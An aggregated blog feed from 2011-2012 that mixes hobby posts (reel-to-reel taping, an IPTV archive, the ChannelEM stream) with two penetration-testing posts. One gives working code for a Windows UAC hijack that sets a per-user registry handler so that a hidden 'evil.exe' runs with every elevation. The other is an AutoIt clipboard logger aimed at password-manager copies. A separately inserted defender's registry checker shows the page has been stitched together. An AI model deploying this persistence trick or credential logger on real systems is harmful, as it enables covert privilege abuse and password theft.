An Update On An Update

Posted by | Posted in IPTV Archive, syndicated | Posted on 16-01-2012

As I said a few weeks ago, things are going on Archive.org. If you would like to follow my progress (and download lots of files more easily) check this page out often.

~Famicoman

Analog Anyone?

Posted by | Posted in Famicoman, syndicated | Posted on 09-01-2012

I have a handful of reel-to-reel players. As an extension of this, I also happen to have around fifty or so reels to accompany the players. For the past few years, they haven’t been doing much besides serving as over-sized paper weights. Over the past couple months though, I have been recording things on to them. Music to be specific, all sorts of music.

I’ve been recording whole albums onto the reels of quarter inch magnetic tape. At 7.5 inches per second, the quality is pretty much indistinguishable from the MP3 player I record them from. At 45 minutes per side of tape, I can put at least one album per side (in most cases).

Why do all this? I like the process. It can be a bit of relaxation to string up a tape on a machine and hit the play button, watching the reels hit tension and hearing the music wind up. Also, it’s not the easiest thing to find pre-recorded music on reels. You can most likely find some jazz or easy listening albums on tape, but rock-oriented music is hard to get and can fetch a high price if you are lucky enough to locate it. As more collectors get at the harder-to-find tapes, recording yourself is pretty much the best way to go if you want your equipment used for anything other than show.

Via Famicoman from Famicoman.com

Coming Soon

Posted by | Posted in Moonlit, syndicated | Posted on 07-01-2012

Via Moonlit from The Moonlit Code

Sarah Tonin: 1. Ephedratic Equasion

Posted by | Posted in Moonlit, syndicated | Posted on 05-01-2012

Via Moonlit from The Moonlit Code

Contraband: 2. Died Of Dissonance

Posted by | Posted in Moonlit, syndicated | Posted on 05-01-2012

I know, I know, I suck at updating stuff. While you all wait for my new album, here’s a Halloween bonus track.
Via Moonlit from The Moonlit Code

(UAC) User Assisted Compromise

Posted by | Posted in Room362, syndicated | Posted on 03-01-2012

A number of times during tests I’ve actually run into those mythical creatures called “patched Windows machines”. At DerbyCon Chris Gates and I released the “Ask” post module (which I had failed to publish). This module very simply uses the ShellExecute Windows function via Railgun with the undocumented (but very well known) operator of ‘runas’. These two lines accomplished that:

client.railgun.add_function( 'shell32', 'ShellExecuteA', 'DWORD',[["DWORD","hwnd","in"],["PCHAR","lpOperation","in"],["PCHAR","lpFile","in"],["PCHAR","lpParameters","in"],["PCHAR","lpDirectory","in"],["DWORD","nShowCmd","in"],])
client.railgun.shell32.ShellExecuteA(nil,"runas","evil.exe",nil,nil,5)

This would quite simply prompt the user with that annoying UAC prompt asking the user to run ‘evil.exe’ with Administrative privs. If they are not “Admins” themselves then it would prompt them for the user name and password (normally the case in systems attached to domains). Something to be aware of: If your evil.exe is not code-signed the UAC box will be orange instead of blue. You can get around this a bit by using rundll32.exe (which is signed ;-) ) as is svchost.exe. (You may also want to not name it evil.exe)

The downfall here is that 1. You have to drop a binary (boooo) 2. You are prompting the user for UAC control when they didn’t do anything to cause it. Users are generally as smart as bait, but it’s good practice to assume to the contrary. If for nothing else other than to challenge yourself to up your game.

Number 1 I’ll leave to another post, so let’s solve #2.

When a “runas” ShellExecute runs (which UAC does natively #hint#hint), a few registry locations are checked. One I’d like to point out is the HKLM\Software\Classes\exefile key. The ‘exefile’ key, as should be obvious, holds the registry settings for executables, and as such tells Windows how to interact with them. In HKLM (which is only writable by Administrators) the “shell\open”, “shell\runas” and “shell\runasuser” subkeys exist (the structure looks oddly familiar to anyone who visited the ShellExecute page more than once). Inside “shell\open\command” the default string is "%1" %* - this basically means execute the binary %1 and hand the arguments given directly to it %*. Awesome! From here you can alter how every EXE runs on the system (don’t do it, Windows doesn’t like you afterwards, trust me, and remember to snapshot if you don’t).

Great, but how does this help us? We aren’t admins. HKCU is writable by the ‘Current User’, hence the name, and it so happens to have a very similar registry path: HKCU\Software\Classes. Depending on your system, it may or may not have an “exefile” subkey. If it doesn’t, it’s pretty easy to create. Let’s make it match the “runas” one in HKLM.

The tree should look something like this when you are done:

  • HKLM
    • Software
      • Classes
        • exefile
          • shell
            • runas
              • command

Under command change the default value to "%1" %* just as it is in HKLM, and add a new String value called ‘IsolatedCommand’ with the same value as default. With these settings, very little has changed on the system or its operation. However, if we change the ‘IsolatedCommand’ String to ‘notepad.exe’ and attempt to ‘Run As Administrator’ on that system using any binary guess what happens? Notepad! (as Admin). w00t. Now we can swap in our evil.exe and bob wins right? Sorta. We still have that horrible problem of stealth. Whatever the user was trying to UAC up won’t work, and they’ll try it again, and start investigating the problem, which we don’t want them to do.

Enter ‘runyou.exe’, it’s some very simple C++ that weighs in at a whopping 8k when compiled (probably could lose some weight by those who know better compiler options):

#include "windows.h"
#include "stdio.h"
#include "tchar.h"

int _tmain(int argc, _TCHAR* argv[])
{
    if (argv[1])
    {
        ShellExecuteW(NULL,NULL,argv[1],NULL,NULL,SW_SHOW);
        if (argv[2])
        {
            ShellExecuteW(NULL,NULL,argv[2],NULL,NULL,SW_HIDE);
        }
    }
    return 0;
}

This code executes the first program visibly and then the second hidden. You probably see where this is going, but we change our IsolatedCommand String to runyou.exe %1 evil.exe and now we give them exactly what they want in an elevated state, but also get our evil binary there too ;-)

The very real down side to this is you have to wait for the user to use UAC (this does not work if someone else does, it’s only for the current user HKCU). But, as a side benefit, it’s a very real form of sneaky persistence as well, as it will execute our evil binary every single time they use UAC.

Game Over… ;-)


Via Mubix from Room362.com
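A defender's check for the per-user override described in this post, added here as an example (not code from the original post): it parses `reg query` output and reports any (Default) or IsolatedCommand value under a per-user exefile handler that is not "%1" %*. The function name and the sample output are constructed for illustration, and English-locale `reg query` output is assumed.

```python
import re

# Pass-through command string the page gives for the stock handler.
EXPECTED = '"%1" %*'
# Per-user exefile verb handlers: HKCU, or a user hive loaded under HKEY_USERS.
KEY_RE = re.compile(
    r'^(HKEY_CURRENT_USER\\Software\\Classes'
    r'|HKEY_USERS\\[^\\]+\\Software\\Classes'
    r'|HKEY_USERS\\[^\\]+_Classes)'
    r'\\exefile\\shell\\(open|runas|runasuser)\\command$', re.IGNORECASE)
# "    <name>    REG_xx    <data>" as printed by `reg query` (data may be empty).
VALUE_RE = re.compile(r'^\s{4}(.+?)\s{4}(REG_\w+)(?:\s{4}(.*))?$')
# Assumption: English-locale output, where the unnamed value prints as (Default).
WATCHED = {'(default)', 'isolatedcommand'}


def find_exefile_overrides(reg_query_output):
    """Return (key, value_name, data) for each per-user exefile command
    value that is not the plain pass-through string."""
    findings, key = [], None
    for line in reg_query_output.splitlines():
        if line.startswith('HKEY_'):
            key = line.strip() if KEY_RE.match(line.strip()) else None
            continue
        m = VALUE_RE.match(line)
        if key and m:
            name, data = m.group(1), (m.group(3) or '').strip()
            if name.lower() in WATCHED and data != EXPECTED:
                findings.append((key, name, data))
    return findings


# Constructed sample of `reg query HKCU\Software\Classes\exefile /s` output,
# using the IsolatedCommand value described in the post.
SAMPLE = r'''
HKEY_CURRENT_USER\Software\Classes\exefile\shell\runas\command
    (Default)    REG_SZ    "%1" %*
    IsolatedCommand    REG_SZ    runyou.exe %1 evil.exe

HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command
    (Default)    REG_SZ    "%1" %*
'''

if __name__ == '__main__':
    for key, name, data in find_exefile_overrides(SAMPLE):
        print(f'REVIEW {key} [{name}] = {data}')
```

On a system where the per-user exefile key was never created, the query returns nothing and the function reports no findings.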

Hak5 Segment Sneak Peek

Posted by | Posted in Room362, syndicated | Posted on 26-12-2011

Since it’s Christmas and all, I thought I’d post the code snippet from my Hak5 segment a bit early:

#include <Clipboard.au3>
#include <File.au3>
$oldclip = ""
While 1
    $clip = _ClipBoard_GetData()
    If $clip <> "0" Then
        If $clip <> $oldclip Then
            _FileWriteLog(@UserProfileDir & "\clip.log", $clip)
            $oldclip = $clip
        EndIf
    EndIf
    Sleep(100)
WEnd

It’s pretty straightforward, and I welcome everyone to install AutoIt3 and compile/run the above script to see what it does (although most of you I’m sure can figure it out just by reading it).

(Think KeePass, 1Password, LastPass…)


Via Mubix from Room362.com

Shared Links

Posted by | Posted in Room362, syndicated | Posted on 23-12-2011

 

When Google Reader decided to remove everything it was good for, we all scrambled to find new homes for things we wanted to share. Tumblr became a place that most of us flocked to. I’ve found Tumblr to be not a very good substitute for Google Reader’s functionality (IMHO).

The other day, carnal0wnage told me about a service called ‘Buffer’, and all this thing does is do scheduled tweets, but it has one distinct feature, not only is it focused around the sharing of links, it works (if you install the browser plugin/extension) INSIDE OF GOOGLE READER ;-) So you can be reading a feed item, push a button and not have to open a page or another app, it’s pretty much all right there.

I know what you’re thinking, cool, but no big deal right? It goes to twitter, and not to a feed that someone can subscribe to. You’re right, and I fought all day trying to figure that part out and finally came up with a twitter search for my tweets and a special hashtag I would use for my shared links. I found the RSS feed for that search and it looks like this:

http://search.twitter.com/search.atom?q=from%3Amubix%20%23SharedLinks

Obviously, this isn’t the easiest or prettiest link to send around, so instead I pumped that into Feedburner and now have this for a feed link:

http://feeds.feedburner.com/MubixLinks

Much easier to share, with one AMAZING added bonus. I can switch the feed that powers it at any time, so from now on, no matter if I use Tumblr or Google Reader (after they unjack themselves) or G+ (if they finally set up a feed for +1’d items), that will always be the link to items that I’ve personally liked and wanted to share.

I encourage you to do the same, and leave a comment, so that I can follow your feed back!

Oh, and sign up for Buffer here (w/ my referral link ;) http://bufferapp.com/r/7e450

 


Via Mubix from Room362.com

ChannelEM and Other News

Posted by | Posted in IPTV Archive, syndicated | Posted on 20-12-2011

Since the beginning of the IPTV Archive, both Moonlit and I had an idea for a video stream that could play IPTV all day. Similar to an actual television station in theory, and RantTV in practice, we set off to work on it. Initial trials were difficult, to say the least. We worked on server side playlists, linking into streaming video sites, having our own flash based platform, transcoding files on the fly to a streaming website, and other methods that never seemed to work. We always had the time to invest, but never enough resources. We didn’t have the money for a dedicated icecast box, or a beefy machine that could just transcode and stream all day. Throughout the years, we’ve had this project going on under one name or another. It started as just something we kicked around to each other, then as a little archive side project, then it was attached to another group, and now it has taken on its own presence.

ChannelEM officially came into being last month, and has been functioning smoothly ever since. The project is a culmination of the efforts of Moonlit, Pat, and myself and will hopefully be around a while to grow and expand. ChannelEM in a nutshell is an IPTV network in the developing stages. While we aim to keep a steady 24/7 stream of independent video, we would also like to expand and reach out to those who run their own shows and would like some exposure to a like-minded community. If that seems up your alley, feel free to give it a look.

 

Moving on to other news, you may have noticed that there have been few updates (with the exception of last week) to the archive in general. That said, I’ve been working on a few other things, and have few shows that need the archival treatment as of right now. In the midst of other projects, and saturating my download with hacker convention videos, I’ve decided to take a step I have been mentioning for a while and am starting the Archive.org phase of this archive. That means over the next few weeks or so, I’ll be transferring my stash of shows onto Archive.org, where it will be safe for years to come. If something ever happens to blip.tv or my hard drives all decide to take a dive one day, the episodes will be in the safe hands of the Internet Archive.

That said, if you have anything to contribute to the archive, or just want to chat about any of these things in general, feel free to exercise the contact and chat pages over to your left and let me know what is on your mind.

~Famicoman

ChannelEM

Posted by | Posted in Famicoman, syndicated | Posted on 20-12-2011

Since starting the IPTV Archive, both Moonlit and I had an idea for a video stream that could play IPTV all day. Similar to an actual television station in theory, and RantTV in practice, we set off to work on it. Initial trials were difficult, to say the least. We worked on server side playlists, linking into streaming video sites, having our own flash based platform, transcoding files on the fly to a streaming website, and other methods that never seemed to work. We always had the time to invest, but never enough resources. We didn’t have the money for a dedicated icecast box, or a beefy machine that could just transcode and stream all day.

Throughout the years, we’ve had this project going on under one name or another. It started as just something we kicked around to each other, then as a little archive side project, then it was attached to another group, and now it has taken on its own presence.

ChannelEM officially came into being last month, and has been functioning smoothly ever since. The project is a culmination of the efforts of Moonlit, Pat, and myself and will hopefully be around a while to grow and expand. ChannelEM in a nutshell is an IPTV network in the developing stages. While we aim to keep a steady 24/7 stream of independent video, we would also like to expand and reach out to those who run their own shows and would like some exposure to a like-minded community. If that seems up your alley, feel free to give it a look.

Via Famicoman from Famicoman.com